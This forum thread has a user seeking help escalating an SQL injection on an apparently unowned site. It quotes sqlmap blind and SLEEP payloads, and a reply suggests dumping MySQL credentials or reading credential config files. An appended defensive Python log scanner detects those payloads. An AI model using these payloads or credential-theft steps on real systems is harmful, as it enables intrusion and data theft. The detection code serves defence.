
Question about SQL injection

x3lh1x

Good day.

I found an SQL injection on a site
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=3 AND 8506=8506
Vector: AND [INFERENCE]

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: type=3 AND (SELECT 2467 FROM (SELECT(SLEEP(5)))XmTO)
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
But how can I escalate the injection to a union (Union Query)? Dumping via boolean or time-based is not much of a pleasure.

Attaching the banner
web application technology: PHP, Nginx
back-end DBMS: MySQL >= 8.0.0
banner: '5.6.16-log'
Should I look for another attack vector, or could something be worked out with tamper scripts?
 
Thanks for the offer, but no)
Man, you quoted a sqlmap output that only finds boolean based injection and ask "HoW tO Do UnIoN ? :3"
If sqlmap does not find a way to union by itself the only alternative is to let a kind expert work on the case and try to find a way to union inject the thing. So asking this kind of question giving this kind of context is not really smart in my opinion.

This being said you can try to increase --risk=3 --level=5 to be sure sqlmap doesn't find something else than boolean blind. But without letting people help you, you have no other possibilities.

You also could bypass your issue by dumping mysql creds or trying to read creds from config files with READ_FILE and attempt to log into the sql server.
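
For defenders reviewing web logs, the two payload families in the sqlmap report quoted in this thread leave recognizable traces in the `type` parameter. The following is an added example (not part of any post in the thread) that scans nginx access-log lines for them; the sample log lines, the /list.php path, and the assumption that `type` is always an integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed nginx access-log lines; addresses and the /list.php path are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2022:10:00:01 +0000] "GET /list.php?type=3 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Dec/2022:10:00:02 +0000] "GET /list.php?type=3%20AND%208506%3D8506 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Dec/2022:10:00:09 +0000] "GET /list.php?type=3+AND+(SELECT+2467+FROM+(SELECT(SLEEP(5)))XmTO) HTTP/1.1" 200 5120
203.0.113.8 - - [10/Dec/2022:10:00:10 +0000] "GET /list.php?type=abc HTTP/1.1" 200 80
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Signatures modelled on the two payload families in the sqlmap report above.
RULES = [
    ("boolean-tautology", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("time-delay", re.compile(r"\bSLEEP\s*\(", re.I)),
]


def classify(value):
    """Return the labels that apply to one decoded parameter value."""
    labels = []
    if not value.isdigit():
        # Assumption: the parameter is a plain integer id, as in type=3.
        labels.append("non-numeric")
    labels += [name for name, rx in RULES if rx.search(value)]
    return labels


def scan(log_text, param="type"):
    """Return (client_ip, decoded_value, labels) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            labels = classify(value)
            if labels:
                hits.append((line.split()[0], value, labels))
    return hits


if __name__ == "__main__":
    for ip, value, labels in scan(SAMPLE_LOG):
        print(ip, labels, repr(value))
```

The "non-numeric" label is the broadest signal here: rejecting any non-integer `type` value at the application, combined with a parameterized query, removes the injection point regardless of payload shape.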
 

